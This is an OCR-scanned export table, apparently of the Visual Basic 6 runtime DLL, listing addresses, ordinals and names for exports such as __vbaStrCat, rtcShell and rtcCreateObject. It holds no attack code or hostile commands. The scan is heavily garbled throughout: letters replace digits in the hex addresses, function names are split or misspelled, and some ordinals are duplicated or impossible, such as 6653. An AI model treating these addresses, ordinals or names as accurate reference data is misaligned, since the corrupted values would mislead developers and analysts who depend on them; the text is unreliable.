Addr:0F01BB38 Ord: 299 (012Bh) Name: TipCreatelnstanceEx 
Addr:0F05E479 Ord: 300 (012Ch) Name: GetMem2 
Addr:0F0E89D6 Ord: 301 (012Dh) Name: GetMem4 
Addr:0F0E89E7 Ord: 302 (012Eh) Name: GetMem8 
Addr:0FOE8A19 Ord: 303 (012Fh) Name: GetMemStr 
Addr:0FOE8A54 Ord: 304 (0130h) Name: GetMemVar 
Addr:0FOES9FE Ord: 305 (0131h) Name: GetMemoObj 
Addr:0F03BF96 Ord: 306 (0132h) Name: PutMem2 
Addr:0FOESAFF Ord: 307 (0133h) Name: PutMem4 
Addr:OFOE8BOE Ord: 308 (0134h) Name: PutMem8 
Addr:0F0E8C15 Ord: 309 (0135h) Name: PutMemsStr 
Addr:0FOE8C5D Ord: 310 (0136h) Name: PutMemVar 
Addr:0F0E8B24 Ord: 311 (0137h) Name: PutMemoObj 


Addr:0OFOE8DAA Ord: 312 (0138h) Name: SetMemVar 
Addr:0F0E8D83 Ord: 313 (0139h) Name: SetMemObj 
Addr:0F0E8A73 Ord: 314 (013Ah) Name: GetMemNewObj 
Addr:0F0E8D19 Ord: 315 (013Bh) Name: PutMemNewObj 
Addr:0FOE8E3E Ord: 316 (013Ch) Name: SetMemNewObj 
Addr:0F0E89C5 Ord: 317 (013Dh) Name: GetMeml1l 
Addr:OFOESAFO Ord: 318 (013Eh) Name: PutMeml 
Addr:OFOESADS Ord: 319 (013Fh) Name: GetMemEvent 
Addr:0F0E8D73 Ord: 320 (0140h) Name: PutMemEvent 
Addr:0F03A29B Ord: 321 (0141h) Name: SetMemEvent 
Addr:0FODF697 Ord: 322 (0142h) Name: _ vbaMidStmtVar 
Addr:OFODF6BF Ord: 323 (0143h) Name: __ vbaMidStmtVarB 
Addr:OFOD5FA2 Ord: 324 (0144h) Name: _ vbaNameFile 
Addr:0FO1BE09C Ord: 325 (0145h) Name: __ vbaNew2 
Addr:0F02B448 Ord: 326 (0146h) Name: __vbaNew 
Addr:0F109E6C Ord: 327 (0147h) Name: __vbaNextEachAry 
Addr:0F103345 Ord: 328 (0148h) Name: _ vbaNextEachCollAd 
Addr:0F1032E6 Ord: 329 (0149h) Name: __vbaNextEachCollObj 
Addr:0F103252 Ord: 330 (014Ah) Name: __ vbaNextEachCollVar 
Addr:0F10AOFl1 Ord: 331 (014Bh) Name: _ vbaNextEachVar 
Addr:0F0D2C73 Ord: 332 (014Ch) Name: __vbaObjAddref 
Addr:0F00361F Ord: 333 (014Dh) Name: __vbaObjls 
Addr:0F01E2F2 Ord: 334 (014Eh) Name: __vbaObjSet 
Addr:0F022D5E Ord: 335 (014Fh) Name: __vbaObjSetAddref 
Addr:0F03361F Ord: 336 (0150h) Name: __vbaObjVar 
Addr:0F01F952 Ord: 337 (0151h) Name: _ vbaOnError 
Addr:0FODOOA6 Ord: 338 (0152h) Name: _ vbaOnGoCheck 
Addr:0F01F2E7 Ord: 339 (0153h) Name: _ vbaPowerR8 
Addr:0F003D3F Ord: 340 (0154h) Name: __vbaPrintFile 
Addr:0F04082B Ord: 341 (0155h) Name: __vbaPrintObj 
Addr:0F036232 Ord: 342 (0156h) Name: __vbaPut3 
Addr:0FODE340 Ord: 343 (0157h) Name: __vbaPut4 
Addr:0FODE39A Ord: 344 (0158h) Name: __vbaPutFxStr3 
Addr:0FODE3DO Ord: 345 (0159h) Name: __vbaPutEFxStr4 
Addr:0F0407B8 Ord: 346 (015Ah) Name: __vbaPutOwner3 
Addr:0FODE37C Ord: 347 (015Bh) Name: __vbaPutOwner4 
Addr:0FO0D9069 Ord: 348 (015Ch) Name: __vbaR4Cy 
Addr:0FODE020 Ord: 349 (015Dh) Name: __vbaR4ErrVar 
Addr:0F10B4D1 Ord: 350 (015Eh) Name: _ vbaR4ForNextCheck 
Addr:0OFODDF7E Ord: 351 (015Fh) Name: __vbaR4Sgn 
Addr:0FOD8CAO Ord: 352 (0160h) Name: __vbaR4Str 
Addr:0F0356D3 Ord: 353 (0161h) Name: __vbaR4Var 
Addr:0F0O2FB8B Ord: 354 (0162h) Name: __vbaR8Cy 
Addr:0FODEO0O2A Ord: 355 (0163h) Name: __vbaR8ErrVar 
Addr:0FOE10A5 Ord: 356 (0164h) Name: __vbaR8FixI2 


Addr:0F039F4E Ord: 357 (0165h) Name: __vbaR8FixI4 
Addr:OF10B50A Ord: 358 (0166h) Name: __vbaR8ForNextCheck 
Addr:0FO0E112F Ord: 359 (0167h) Name: __vbaR8Int2 
Addr:0F0E1152 Ord: 360 (0168h) Name: __vbaR8IntI4 
Addr:OFODDFA9 Ord: 361 (0169h) Name: __vbaR8Sgn 
Addr:0FOD8CD4 Ord: 362 (016Ah) Name: __vbaR8Str 
Addr:OFO1EFES5 Ord: 363 (016Bh) Name: __vbaR8Var 
Addr:0F10B175 Ord: 364 (016Ch) Name: __vbaRaiseEvent 
Addr:0FOD35E4 Ord: 365 (016Dh) Name: _ vbaRecAnsiToUni 
Addr:0FOD361E Ord: 366 (016Eh) Name: _ vbaRecDestructAnsi 
Addr:OFOD35AA Ord: 367 (016Fh) Name: _ vbaRecUniTOoAnsi 
Addr:0F01C113 Ord: 368 (0170h) Name: __ vbaRedim 
Addr:0F042A56 Ord: 369 (0171h) Name: _ vbaRedimPreserve 
Addr:0F0D3995 Ord: 370 (0172h) Name: _ vbaRedimPreserveVar 
Addr:0F0D3977 Ord: 371 (0173h) Name: __ vbaRedimVar 
Addr:0FO0O1EF4A Ord: 372 (0174h) Name: __vbaRefVarAry 
Addr:OFODBCES Ord: 373 (0175h) Name: __vbaResume 
Addr:0FODF398 Ord: 374 (0176h) Name: __vbaRsetPFixstr 
Addr:OFOEOFSA Ord: 375 (0177h) Name: __vbaRsetFixstrFree 
Addr:0FOS8DAB Ord: 376 (0178h) Name: __vbaSetSystemError 
Addr:0FOCFC96 Ord: 377 (0179h) Name: __vbaStopExe 
Addr:0F102D92 Ord: 378 (017Ah) Name: __vbaStr2Vec 
Addr:OFOCFEFD Ord: 379 (017Bh) Name: __vbaStrAryToAnsi 
Addr:0FOCFF13 Ord: 380 (017Ch) Name: __vbaStrAryToUnicode 
Addr:0F0D843C Ord: 381 (017Dh) Name: __vbaStrBool 
Addr:0F00208F Ord: 382 (017Eh) Name: __vbaStrCat 
Addr:0FO01F8F6 Ord: 383 (017Fh) Name: __vbaStrCmp 
Addr:0F003563 Ord: 384 (0180h) Name: __vbaStrComp 
Addr:0FODF5D4 Ord: 385 (0181h) Name: __vbaStrCompVar 
Addr:0FOD84FC Ord: 386 (0182h) Name: __vbaStrCy 
Addr:0F0D84B8 Ord: 387 (0183h) Name: __vbaStrDate 
Addr:0FOEOF14 Ord: 388 (0184h) Name: __vbaStrFixstr 
Addr:0F0129F8 Ord: 389 (0185h) Name: __vbastrI2 
Addr:0FO1BECF Ord: 390 (0186h) Name: __vbaStrI4 
Addr:OFOEOEB4 Ord: 391 (0187h) Name: __vbaStrLike 
Addr:0F0438CE Ord: 392 (0188h) Name: __vbaStrR4 
Addr:0F04024E Ord: 393 (0189h) Name: __vbaStrR8 
Addr:OFOEOE9F Ord: 394 (018Ah) Name: __vbaStrTextCmp 
Addr:OFOEOEC9 Ord: 395 (018Bh) Name: __vbaStrTextLike 
Addr:0FOCFD43 Ord: 396 (018Ch) Name: __vbaStrToAnsi 
Addr:0F0CFD14 Ord: 397 (018Dh) Name: __vbaStrToUnicode 
Addr:0FOD8481 Ord: 398 (018Eh) Name: __vbaStrUll 
Addr:0F0D8533 Ord: 399 (018Fh) Name: __ vbaStrVarCopy 
Addr:0F03634A Ord: 400 (0190h) Name: 
EVENT_SINK_QuerylInterface 


Addr:0F02299D Ord: 401 (0191h) Name: EVENT_SINK_AddRef 
Addr:0F037FD1 Ord: 402 (0192h) Name: EVENT_SINK_Release 
Addr:OFOCFB3F Ord: 403 (0193h) Name: 
EVENT_SINK_GetIDsOfNames 

Addr:0F03BB08 Ord: 404 (0194h) Name: EVENT_SINK_Invoke 
Addr:0F0262A1 Ord: 405 (0195h) Name: __vbaStrVarMove 
Addr:0F05A825 Ord: 406 (0196h) Name: __vbaStrVarVal 
Addr:0F10A20C Ord: 407 (0197h) Name: __vbaUIICy 
Addr:OFODDFE8 Ord: 408 (0198h) Name: __vbaUIlErrVar 
Addr:0FO0D901D Ord: 409 (0199h) Name: __vbaUllStr 
Addr:0F014C08 Ord: 410 (019Ah) Name: 
BASIC_CLASS_QuerylInterface 
Addr:0F0025FE Ord: 411 (019Bh) Name: BASIC_CLASS_AddRef 
Addr:0FO1DCE6F Ord: 412 (019Ch) Name: BASIC_CLASS_Release 
Addr:0F054DAS Ord: 413 (019Dh) Name: 
BASIC_CLASS_GetlDsOfNames 

Addr:0F054792 Ord: 414 (019Eh) Name: BASIC_CLASS_Invoke 
Addr:0FODE002 Ord: 415 (019Fh) Name: __vbaUll Var 
Addr:0F01BD72 Ord: 416 (O1AOh) Name: _ vbaUbound 
Addr:0F0OD2D6D Ord: 417 (01A1h) Name: __vbaUnkVar 
Addr:0F102A2D Ord: 418 (01A2h) Name: __vbaVar2Vec 
Addr:0F10A2E0 Ord: 419 (01A3h) Name: __vbaVarAbs 
Addr:0FOCF8C1 Ord: 420 (01A4h) Name: 
BASIC_DISPINTERFACE_ GetTICount 

Addr:0FOCF8DO Ord: 421 (01A5h) Name: 
BASIC_DISPINTERFACE_GetTypelnfo 

Addr:0F100ECC Ord: 422 (01A6h) Name: __vbaVarAdd 
Addr:0F100AB2 Ord: 423 (01A7h) Name: __vbaVarAnd 
Addr:0F004B24 Ord: 424 (01A8h) Name: _ vbaVarCat 
Addr:0F10BA7F Ord: 425 (01A9h) Name: __ vbaVarCmpEq 
Addr:0F10BABS Ord: 426 (01AAh) Name: __vbaVarCmpGe 
Addr:0F10BAEB Ord: 427 (01ABh) Name: _ vbaVarCmpGt 
Addr:0F10BB21 Ord: 428 (01ACh) Name: _ vbaVarCmpLe 
Addr:0F10BB57 Ord: 429 (01ADh) Name: __vbaVarCmpLt 
Addr:0F0437B7 Ord: 430 (01 AEh) Name: Zombie_QueryInterface 
Addr:0F03C29A Ord: 431 (01AFh) Name: Zombie_AddRef 
Addr:0F043368 Ord: 432 (01B0h) Name: Zombie_Release 
Addr:0FOCFBB7 Ord: 433 (01B 1h) Name: 
Zombie_GetTypelnfoCount 

Addr:OFOCFBAF Ord: 434 (01B2h) Name: Zombie_GetTypelnfo 
Addr:OFOCFBBF Ord: 435 (01B3h) Name: Zombie_GetIDsOfNames 
Addr:0FOCFBC7 Ord: 436 (01B4h) Name: Zombie_Invoke 
Addr:0F1020B8 Ord: 437 (01B5h) Name: __vbaVarCmpNe 
Addr:0F06168C Ord: 438 (01B6h) Name: __ vbaVarDateVar 
Addr:0F10137B Ord: 439 (01B7h) Name: __vbaVarDiv 


Addr:OFOCFAFF Ord: 440 (01B8h) Name: EVENT_SINK2_AddRef 
Addr:OFOCFB1F Ord: 441 (01B9h) Name: EVENT_SINK2_Release 
Addr:0F10B69A Ord: 442 (01BAh) Name: __vbaVarEqv 
Addr:0FOD8FE2 Ord: 443 (01BBh) Name: __vbaVarErrl4 
Addr:0F10A43C Ord: 444 (01BCh) Name: __vbaVarFix 
Addr:0F103395 Ord: 445 (01BDh) Name: __vbaVarForlnit 
Addr:0F1034CF Ord: 446 (01BEh) Name: __vbaVarForNext 
Addr:0F1020EB Ord: 447 (01BFh) Name: __vbaVarldiv 
Addr:0F10B737 Ord: 448 (01C0h) Name: __vbaVarlmp 
Addr:0FO1EFD9 Ord: 449 (01C1h) Name: _ vbaVarIndexLoad 
Addr:0F058D54 Ord: 450 (01C2h) Name: __ vbaVarIndexLoadRef 
Addr:0FOD39BA Ord: 451 (01C3h) Name: 

_ vbaVarlndexLoadRefLock 

Addr:0FOD39F4 Ord: 452 (01C4h) Name: _ vbaVarIndexStore 
Addr:0FOD39FE Ord: 453 (01C5h) Name: __vbaVarIndexStoreObj 
Addr:0F10A538 Ord: 454 (01C6h) Name: __vbaVarlnt 
Addr:0FOEOE45 Ord: 455 (01C7h) Name: __vbaVarLike 
Addr:OFOEOEDE Ord: 456 (01C8h) Name: _ vbaVarLikeVar 
Addr:0F103154 Ord: 457 (01C9h) Name: __vbaVarMod 
Addr:0F101986 Ord: 458 (O01CAh) Name: __vbaVarMul 
Addr:0F102AA9 Ord: 459 (01CBh) Name: _ vbaVarNeg 
Addr:0F102EFC Ord: 460 (01CCh) Name: __ vbaVarNot 
Addr:0F10B543 Ord: 461 (01CDh) Name: __vbaVarOr 
Addr:0F101FBC Ord: 462 (01CEh) Name: __vbaVarPow 
Addr:0F0D2C88 Ord: 463 (01CFh) Name: __vbaVarSetObj 
Addr:0FOSC3AA Ord: 464 (01D0h) Name: __vbaVarSetObjAddref 
Addr:0FOD2CB4 Ord: 465 (01D1h) Name: __vbaVarSetUnk 
Addr:0FOD2CEO0 Ord: 466 (01D2h) Name: _ vbaVarSetUnkAddref 
Addr:0F0496B1 Ord: 467 (01D3h) Name: __vbaVarSetVar 
Addr:0FO0D2D09 Ord: 468 (01D4h) Name: _ vbaVarSetVarAddref 
Addr:0F1024CD Ord: 469 (01D5h) Name: _ vbaVarSub 
Addr:0F10BB8D Ord: 470 (01D6h) Name: __vbaVarTextCmpEqg 
Addr:0F10BBF9 Ord: 471 (01D7h) Name: __vbaVarTextCmpGe 
Addr:0F10BC2F Ord: 472 (01D8h) Name: _ vbaVarTextCmpGt 
Addr:0F10BC65 Ord: 473 (01D9h) Name: __vbaVarTextCmpLe 
Addr:0F10BC9B Ord: 474 (01DAh) Name: __vbaVarTextCmpLt 
Addr:0F10BBC3 Ord: 475 (01DBh) Name: __ vbaVarTextCmpNe 
Addr:0FOE0E72 Ord: 476 (01DCh) Name: __vbaVarTextLike 
Addr:0FOEOEP9 Ord: 477 (01DDh) Name: __vbaVarTextLikeVar 
Addr:0F10B9E9 Ord: 478 (01DEh) Name: __vbaVarTextTstEq 
Addr:OFIOBA1B Ord: 479 (01DFh) Name: __ vbaVarTextTstGe 
Addr:0F10BA34 Ord: 480 (01EO0h) Name: _ vbaVarTextTstGt 
Addr:0F10BA4D Ord: 481 (01E1h) Name: __vbaVarTextTstLe 
Addr:0F10BA66 Ord: 482 (01E2h) Name: _ vbaVarTextTstLt 
Addr:0F10BA02 Ord: 483 (01E3h) Name: _ vbaVarTextTstNe 


Addr:0F10B99E Ord: 484 (01E4h) Name: __vbaVarTstEg 
Addr:0F10B9B7 Ord: 485 (01E5h) Name: _ vbaVarTstGe 
Addr:0F101F8A Ord: 486 (01E6h) Name: __vbaVarTstGt 
Addr:0F10B9DO0 Ord: 487 (01E7h) Name: __ vbaVarTstLe 
Addr:0F1032B4 Ord: 488 (01ESh) Name: _ vbaVarTstLt 
Addr:0F10209F Ord: 489 (01E9h) Name: __vbaVarTstNe 
Addr:0F10B5SFF Ord: 490 (01EAh) Name: __vbaVarXor 
Addr:0F109CC3 Ord: 491 (01EBh) Name: __vbaVargObj 
Addr:0F109D2B Ord: 492 (01ECh) Name: _ vbaVargObjAddref 
Addr:0F109D93 Ord: 493 (01EDh) Name: __vbaVargUnk 
Addr:0F109DFS5 Ord: 494 (01EEh) Name: _ vbaVargUnkAddref 
Addr:0F0D2D45 Ord: 495 (01EFh) Name: __ vbaVerifyVarObj 
Addr:0FOD65BC Ord: 496 (01FOh) Name: __vbaWriteFile 
Addr:0FOE78A1 Ord: 497 (01F1h) Name: _adj_fdiv_ml161 
Addr:0F0E7809 Ord: 498 (01F2h) Name: _adj_fdiv_m32 
Addr:0FOE78D5 Ord: 499 (01F3h) Name: _adj_fdiv_m321 
Addr:0F0E7855 Ord: 500 (01F4h) Name: _adj_fdiv_m64 
Addr:0F0E7344 Ord: 501 (01F5h) Name: _adj_fdiv_r 
Addr:0FOE79A1 Ord: 502 (01F6h) Name: _adj_fdivr_m161 
Addr:0F0E7909 Ord: 503 (01F7h) Name: _adj_fdivr_m32 
Addr:0F0E79D5 Ord: 504 (01F8h) Name: _adj_fdivr_m321 
Addr:0F0E7955 Ord: 505 (01F9h) Name: _adj_fdivr_m64 
Addr:0FO0OE7F91 Ord: 506 (01FAh) Name: _adj_fpatan 
Addr:0F0E7C24 Ord: 507 (01FBh) Name: _adj_fprem 
Addr:OFOE7EDC Ord: 508 (01FCh) Name: _adj_fpreml 
Addr:0F0OE7F94 Ord: 509 (01FDh) Name: _adj_fptan 
Addr:0FOEA763 Ord: 510 (01FEh) Name: _allmul 
Addr:0F00B87E Ord: 512 (0200h) Name: rtcLeftBstr 
Addr:0FOOB8SFD Ord: 513 (0201h) Name: rtcLeftVar 
Addr:0F012425 Ord: 514 (0202h) Name: rtcRightBstr 
Addr:0F0123C4 Ord: 515 (0203h) Name: rtcRightVar 
Addr:0F03C89B Ord: 516 (0204h) Name: rtcAnsiValueBstr 
Addr:0F03A4D7 Ord: 517 (0205h) Name: rtcLowerCaseBstr 
Addr:0F03A479 Ord: 518 (0206h) Name: rtecLowerCaseVar 
Addr:0F0122F0 Ord: 519 (0207h) Name: rtcTrimBstr 
Addr:0FODF23C Ord: 520 (0208h) Name: rtcTrimVar 
Addr:0FODF2B5 Ord: 521 (0209h) Name: rtcLeftTrimBstr 
Addr:0FODF2DA Ord: 522 (020Ah) Name: rtcLeftTrimVar 
Addr:0OFODF4BC Ord: 523 (020Bh) Name: rtcRightTrimBstr 
Addr:0FODF4E1 Ord: 524 (020Ch) Name: rtcRightTrimVar 
Addr:0FODF81E Ord: 525 (020Dh) Name: rtcSpaceBstr 
Addr:0FODF860 Ord: 526 (020Eh) Name: rteSpaceVar 
Addr:0FODF88E Ord: 527 (020Fh) Name: rtcUpperCaseBstr 
Addr:0FODF8B3 Ord: 528 (0210h) Name: rtcUpperCaseVar 
Addr:0F01272A Ord: 529 (0211h) Name: rtcKillFiles 


Addr:0FOD5C7F Ord: 530 (0212h) Name: rtcChangeDir 
Addr:0FOD5CA2 Ord: 531 (0213h) Name: rtcMakeDir 
Addr:0FOD5CB3 Ord: 532 (0214h) Name: rtcRemoveDir 
Addr:0F0D6033 Ord: 533 (0215h) Name: rtcChangeDrive 
Addr:0FOD3A18 Ord: 534 (0216h) Name: rtcBeep 
Addr:0F022D75 Ord: 535 (0217h) Name: rtcGetTimer 
Addr:0F050519 Ord: 536 (0218h) Name: rteStrFromVar 
Addr:0F01BCE6 Ord: 537 (0219h) Name: rtcBstrFromAnsi 
Addr:0F0D6626 Ord: 538 (021Ah) Name: rtcPackDate 
Addr:0FOD668A Ord: 539 (021Bh) Name: rtcPackTime 
Addr:0FOD66F4 Ord: 540 (021Ch) Name: rtcGetDateV alue 
Addr:0F0D676C Ord: 541 (021Dh) Name: rtcGetTimeV alue 
Addr:0FO0D686F Ord: 542 (021Eh) Name: rtcGetDayOfMonth 
Addr:0F0D6931 Ord: 543 (021Fh) Name: rteGetHourOfDay 
Addr:0F0D6978 Ord: 544 (0220h) Name: rteGetMinuteOfHour 
Addr:0F0D6828 Ord: 543 (0221h) Name: rteGetMonthOf Year 
Addr:0FO1B4AC Ord: 546 (0222h) Name: rtcGetPresentDate 
Addr:0FOD69BF Ord: 547 (0223h) Name: rteGetSecondOfMinute 
Addr:OFOD6A8A Ord: 548 (0224h) Name: rtcSetDate Var 
Addr:0FOD6AD7 Ord: 549 (0225h) Name: rtcSetDateBstr 
Addr:0FOD6CDS3 Ord: 550 (0226h) Name: rtcSetTimeVar 
Addr:0F0D6D30 Ord: 551 (0227h) Name: rtcSetTimeBstr 
Addr:0FO0D68B6 Ord: 552 (0228h) Name: rteGetDayOf Week 
Addr:0FOD67E1 Ord: 553 (0229h) Name: rtcGetYear 
Addr:0F0D7D20 Ord: 554 (022Ah) Name: rtcFileReset 
Addr:0FOD7DBD Ord: 555 (022Bh) Name: rtcFileAttributes 
Addr:0FOSE65B Ord: 556 (022Ch) Name: rtcIsArray 
Addr:0F0D3A44 Ord: 557 (022Dh) Name: rtcIsDate 
Addr:0F0D3B2C Ord: 558 (022Eh) Name: rtcIsEmpty 
Addr:0F0D3B43 Ord: 559 (022Fh) Name: rtcIsError 
Addr:0FOD3BS5E Ord: 560 (0230h) Name: rtcIsNull 
Addr:0F0D3B77 Ord: 561 (0231h) Name: rtcIsNumeric 
Addr:0FOD3CA9 Ord: 562 (0232h) Name: rtcIsObject 
Addr:0F0506E7 Ord: 563 (0233h) Name: rtcVarType 
Addr:0F0D8118 Ord: 564 (0234h) Name: rtDecFromVar 
Addr:0F0D7D4A Ord: 565 (0235h) Name: rtcFile Width 
Addr:0OFODCF9D Ord: 566 (0236h) Name: rteInputCount 
Addr:0OFODCF6EC Ord: 567 (0237h) Name: rtcInputCountVar 
Addr:0FODEO534 Ord: 568 (0238h) Name: rtcFileSeek 
Addr:0FODE19D Ord: 569 (0239h) Name: rtcFileLocation 
Addr:0F0DE230 Ord: 570 (023Ah) Name: rtcFileLength 
Addr:0F0D7E39 Ord: 571 (023Bh) Name: rtcEndOfFile 
Addr:0F05D268 Ord: 572 (023Ch) Name: rtcHexBstrFromVar 
Addr:0F05D22E Ord: 573 (023Dh) Name: rtcHexVarFromVar 
Addr:0FOD8D4B Ord: 574 (023Eh) Name: rtcOctBstrFromVar 


Addr:0FOD8E54 Ord: 575 (023Fh) Name: rtcOctV arFromVar 
Addr:0F054278 Ord: 576 (0240h) Name: rtcFileCopy 
Addr:OFOD5D5F Ord: 577 (0241h) Name: rtcFileDateTime 
Addr:0F036192 Ord: 578 (0242h) Name: rtcFileLen 
Addr:0FOD5E2D Ord: 579 (0243h) Name: rtcGetFileAttr 
Addr:0FOD5E62 Ord: 580 (0244h) Name: rtcSetFileAttr 
Addr:0FODD1FE Ord: 581 (0245h) Name: rtcR8ValFromBstr 
Addr:0F0D3CC3 Ord: 582 (0246h) Name: rtcSin 
Addr:0FOD3CEC Ord: 583 (0247h) Name: rtcCos 
Addr:0FO0D3D15 Ord: 584 (0248h) Name: rtcTan 
Addr:0F0OD3D45 Ord: 583 (0249h) Name: rtcAtn 
Addr:0F01F4E3 Ord: 586 (024Ah) Name: rtcExp 
Addr:0FO1FOFC Ord: 587 (024Bh) Name: rtcLog 
Addr:0F01F42A Ord: 588 (024Ch) Name: rtcRgb 
Addr:0FOS50A8D Ord: 589 (024Dh) Name: rtcQBColor 
Addr:0F0OD7F70 Ord: 590 (024Eh) Name: rtecMacId 
Addr:0F060COA Ord: 591 (024Fh) Name: rte TypeName 
Addr:0F05BD16 Ord: 592 (0250h) Name: rtcIsMissing 
Addr:0F004A95 Ord: 593 (0251h) Name: rteRandomNext 
Addr:0F03AE08 Ord: 594 (0252h) Name: rtcRandomize 
Addr:0FOD405A Ord: 595 (0253h) Name: rteMsgBox 
Addr:0F0D4253 Ord: 596 (0254h) Name: rtelnputBox 
Addr:0F0D3D95 Ord: 597 (0255h) Name: rtcAppActivate 
Addr:0F0261B4 Ord: 598 (0256h) Name: rtcDoEvents 
Addr:0F0475F8 Ord: 599 (0257h) Name: rteSendKeys 
Addr:0FODOA69 Ord: 600 (0258h) Name: rtcShell 
Addr:0F1099BA Ord: 601 (0259h) Name: rtcArray 
Addr:0FOD3A21 Ord: 603 (025Dh) Name: rtcGetErl 
Addr:0F04EC33 Ord: 606 (025Eh) Name: rtcStringBstr 
Addr:0F04EBF6 Ord: 607 (025Fh) Name: rtcStringVar 
Addr:0F01BD44 Ord: 608 (0260h) Name: rtc VarBstrFromAnsi 
Addr:0F0D7009 Ord: 609 (0261h) Name: rtcGetDateBstr 
Addr:0F01B62E Ord: 610 (0262h) Name: rtcGetDate Var 
Addr:0FOD70CD Ord: 611 (0263h) Name: rtcGetTimeBstr 
Addr:0FOD6FB8 Ord: 612 (0264h) Name: rtcGetTimeVar 
Addr:0F058DD8 Ord: 613 (0265h) Name: rte VarStrFromVar 
Addr:0F0D3D50 Ord: 614 (0266h) Name: rtcSqr 
Addr:0F0D4678 Ord: 615 (0267h) Name: rtcIMEStatus 
Addr:0F012378 Ord: 616 (0268h) Name: rtcLeftCharBstr 
Addr:0F00B8C4 Ord: 617 (0269h) Name: rtcLeftCharV ar 
Addr:0FODED66 Ord: 618 (026Ah) Name: rtcRightCharBstr 
Addr:0F01238B Ord: 619 (026Bh) Name: rtcRightCharVar 
Addr:0FODDOA7 Ord: 620 (026Ch) Name: rteInputCharCount 
Addr:0F0DDO76 Ord: 621 (026Dh) Name: rteInputCharCountVar 
Addr:OFOEOA2C Ord: 622 (026Eh) Name: rtcStrConvVar 


Addr:0FODO9C7 Ord: 624 (0270h) Name: rteGetHostLCID 
Addr:0F0O3AB67 Ord: 625 (0271h) Name: rtcCreateObject 
Addr:0F0D2A4B Ord: 626 (0272h) Name: rteGetObject 
Addr:0FOESE4E Ord: 627 (0273h) Name: rtcAppleScript 
Addr:OFOOBCES Ord: 628 (0274h) Name: rtecMidBstr 
Addr:0FODED79 Ord: 629 (0275h) Name: rteMidVar 
Addr:0FODEEBS Ord: 630 (0276h) Name: rtcInStr 
Addr:OFOOBCBO Ord: 631 (0277h) Name: rtecMidCharBstr 
Addr:0F04306E Ord: 632 (0278h) Name: rteMidCharVar 
Addr:0FODEE39 Ord: 633 (0279h) Name: rtcInStrChar 
Addr:0F0D8592 Ord: 634 (027Ah) Name: rtBstrFromErrVar 
Addr:OFODSABF Ord: 635 (027Bh) Name: rtBoolFromErrVar 
Addr:0FOD83AA Ord: 636 (027Ch) Name: rtCyFromErrVar 
Addr:0FOD816C Ord: 637 (027Dh) Name: rtl2FromErrVar 
Addr:0F0OD81F3 Ord: 638 (027Eh) Name: rtl4FromErrVar 
Addr:0FOD826F Ord: 639 (027Fh) Name: rtR4FromErrVar 
Addr:0FOD82FE5 Ord: 640 (0280h) Name: rtR8FromErrVar 
Addr:0F0D8A73 Ord: 641 (0281h) Name: rtcDateFromVar 
Addr:0FOD86E2 Ord: 642 (0282h) Name: rtcVarFromVar 
Addr:0F0D8722 Ord: 643 (0283h) Name: rte CVErrFromVar 
Addr:0FOD4AC3 Ord: 644 (0284h) Name: VarPtr 
Addr:0F040CDA Ord: 645 (0285h) Name: rtcDir 
Addr:OFOD5ADS8 Ord: 646 (0286h) Name: rtcCurrentDirBstr 
Addr:0FOD5A29 Ord: 647 (0287h) Name: rtcCurrentDir 
Addr:0F00369C Ord: 648 (0288h) Name: rtcFreeFile 
Addr:O0FODESAS Ord: 649 (0289h) Name: rtcCompareBstr 
Addr:0F019070 Ord: 650 (028Ah) Name: rtcBstrFromFormatV ar 
Addr:0F0497D53 Ord: 651 (028Bh) Name: rtcBstrFromError 
Addr:0F0497A7 Ord: 652 (028Ch) Name: rtc VarFromError 
Addr:0FODEDO2 Ord: 653 (028Dh) Name: rtcLenCharVar 
Addr:0FODED2B Ord: 654 (028Eh) Name: rtcLenVar 
Addr:0F0D8766 Ord: 655 (028Fh) Name: rtcFixVar 
Addr:0F0D87CD Ord: 656 (0290h) Name: rtcAbsVar 
Addr:0F0D8834 Ord: 657 (0291h) Name: rtcIntVar 
Addr:0F0D889B Ord: 658 (0292h) Name: rtecSgnVar 
Addr:0F0DCO025 Ord: 660 (0294h) Name: rtc VarFromFormatV ar 
Addr:0F0OD72CB Ord: 661 (0295h) Name: rtcDateAdd 
Addr:0FOD75AD Ord: 662 (0296h) Name: rtcDateDiff 
Addr:0FOD78EA Ord: 663 (0297h) Name: rtcDatePart 
Addr:0F0D4693 Ord: 664 (0298h) Name: rtcPartition 
Addr:0F0D4991 Ord: 6653 (0299h) Name: rtcChoose 
Addr:0F04285D Ord: 666 (029Ah) Name: rtcEnvironVar 
Addr:0F04288B Ord: 667 (029Bh) Name: rtcEnvironBstr 
Addr:0FOD4A4C Ord: 668 (029Ch) Name: rtcSwitch 
Addr:0F012135 Ord: 669 (029Dh) Name: rte CommandBstr 


Addr:0F01218E Ord: 670 (029Eh) Name: rte CommandVar 
Addr:0FOE8E55 Ord: 671 (029Fh) Name: rteSLN 
Addr:OFOESE7A Ord: 672 (02A0h) Name: rteS YD 
Addr:0FOE8ECB Ord: 673 (02A 1h) Name: rteDDB 
Addr:0FOE901B Ord: 674 (02A2h) Name: rtcIPMT 
Addr:0F0E9107 Ord: 675 (02A3h) Name: rtePPMT 
Addr:0FOE91A5 Ord: 676 (02A4h) Name: rtecPMT 
Addr:0F0E9275 Ord: 677 (02A5h) Name: rtcPV 
Addr:0F0E9325 Ord: 678 (02A6h) Name: rtcFV 
Addr:0F0E93DC Ord: 679 (02A7h) Name: rtcNPer 
Addr:0F0E9514 Ord: 680 (02A8h) Name: rtcRate 
Addr:0F01B43E Ord: 681 (02A9h) Name: rtcImmediatelf 
Addr:0F0E9732 Ord: 682 (02AAh) Name: rtcIRR 
Addr:O0FOE9A66 Ord: 683 (02ABh) Name: rte MIRR 
Addr:OFOE9BEE Ord: 684 (02ACh) Name: rteNPV 
Addr:0F00D607 Ord: 685 (02ADh) Name: rtcErrObj 
Addr:0F0D8B28 Ord: 686 (02AEHh) Name: rtUll FromErrVar 
Addr:0FOD8SA7F Ord: 687 (02AFh) Name: rte VarDateFromVar 
Addr:0FOE9DFEB Ord: 689 (02B 1h) Name: rtcGetSetting 
Addr:0FOE9FCS Ord: 690 (02B2h) Name: rtcSaveSetting 
Addr:OFOEAOB6 Ord: 691 (02B3h) Name: rtcDeleteSetting 
Addr:0FOEA4A7 Ord: 692 (02B4h) Name: rteGetAllSettings 
Addr:OFODEDFS Ord: 693 (02B5h) Name: rtcByteValueBstr 
Addr:0FOD8BAD Ord: 694 (02B6h) Name: rtcBstrFromByte 
Addr:0FOD8BCE Ord: 695 (02B7h) Name: rtcVarBstrFromByte 
Addr:0FODEE14 Ord: 696 (02B8h) Name: rtcCharValueBstr 
